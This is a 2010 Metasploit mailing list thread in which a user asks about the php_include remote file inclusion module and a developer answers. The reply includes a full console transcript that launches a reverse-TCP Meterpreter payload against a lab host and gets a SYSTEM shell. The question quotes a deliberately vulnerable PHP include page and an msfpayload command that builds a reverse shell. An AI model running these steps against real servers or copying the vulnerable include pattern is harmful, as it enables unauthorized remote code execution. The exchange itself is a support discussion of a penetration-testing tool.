Metasploit mailing list archives
Re: php_include confusion
From: egypt () metasploit com
Date: Mon, 12 Jul 2010 18:01:33 -0600
PHP is no longer configured to be vulnerable to this class of exploits by default. If you want to play with it, you'll need to set allow_url_include to true in your php.ini. XXpathXX gets replaced with the URL of the payload. There are several ways you could have discovered this yourself. The easiest way is to modify the exploit to print out the request before sending it. Alternatively, you could run a sniffer or just read the code, which may be a good idea anyway since you appear to have some misconceptions about what this exploit does. You don't need to generate the payload and you don't need to host it anywhere else; everything needed to run arbitrary code is contained in the exploit. The following is a transcript of the exploit working as expected: msf exploit(php_include) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- PATH / yes The base directory to prepend to the URL to try PHPRFIDB no A local file containing a list of URLs to try, with XXpathXX replacing the URL PHPURI /vuln/test.php?path=XXpathXX no The URI to request, with the include parameter changed to XXpathXX Proxies no Use a proxy chain RHOST 192.168.99.129 yes The target address RPORT 80 yes The target port SRVHOST 192.168.99.1 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. URIPATH /foo no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (php/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.99.1 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(php_include) > exploit [*] Started reverse handler on 192.168.99.1:4444 [*] Using URL: http://192.168.99.1:8080/foo [*] PHP include server started. [*] Sending stage (33846 bytes) to 192.168.99.129 [*] Meterpreter session 4 opened (192.168.99.1:4444 -> 192.168.99.129:1415) at Mon Jul 12 17:55:48 -0600 2010 meterpreter > getuid Server username: SYSTEM (0) meterpreter > Hope this helped, egypt On Mon, Jul 12, 2010 at 5:07 PM, Jeffs <jeffs () speakeasy net> wrote:
In metapsloit when using the /unix/webapp/php_include the attacker is asked to include a value for PHPURI such as /slogin_lib.inc.php?slogin_path=XXpathXX Regarding the XXpathXX value, am I correct to assume this passes through to the metasploit engine to construct an obfuscated string that is then sent to the vulnerable site, appended to the URL automatically? All documentation and information on using this exploit suggests that if you are not going to use the PHPRFIDB setting, to leave this as "XXpathXX". However all my experimentation does not send a specific url to the vulnerable site as is demonstrated in several videos on this subject. I know my rhost and lhost are correct, along with all other settings. The apache server runs php and is accessible. The metapsloit service just hangs at: [*] PHP include server started. index_test.php looks like this: <html> <body> <? require $_GET['include'] ?> </body> </html> and include.php.txt was created properly with msfpayload as such. ./msfpayload php/reverse_php LHOST=192.168.1.101 R > /var/www/include.php.txt Both files on the are the web server in the proper directories. If someone could clarify the XXpathXX value for me that would be greatly appreciated. Thanks much jeffs _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: Meterpreter unexpectedly closes, (continued)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
- Re: uploadexec and kitrap0d Miguel Rios (Jul 10)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 10)
- Re: uploadexec and kitrap0d Devin Kinch (Jul 11)
- Re: uploadexec and kitrap0d Rob Fuller (Jul 12)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- php_include confusion Jeffs (Jul 12)
- Re: php_include confusion egypt (Jul 12)
- Re: php_include confusion HD Moore (Jul 12)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- Re: Meterpreter unexpectedly closes CED (Jul 10)
- Re: Meterpreter unexpectedly closes Joshua J. Drake (Jul 11)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)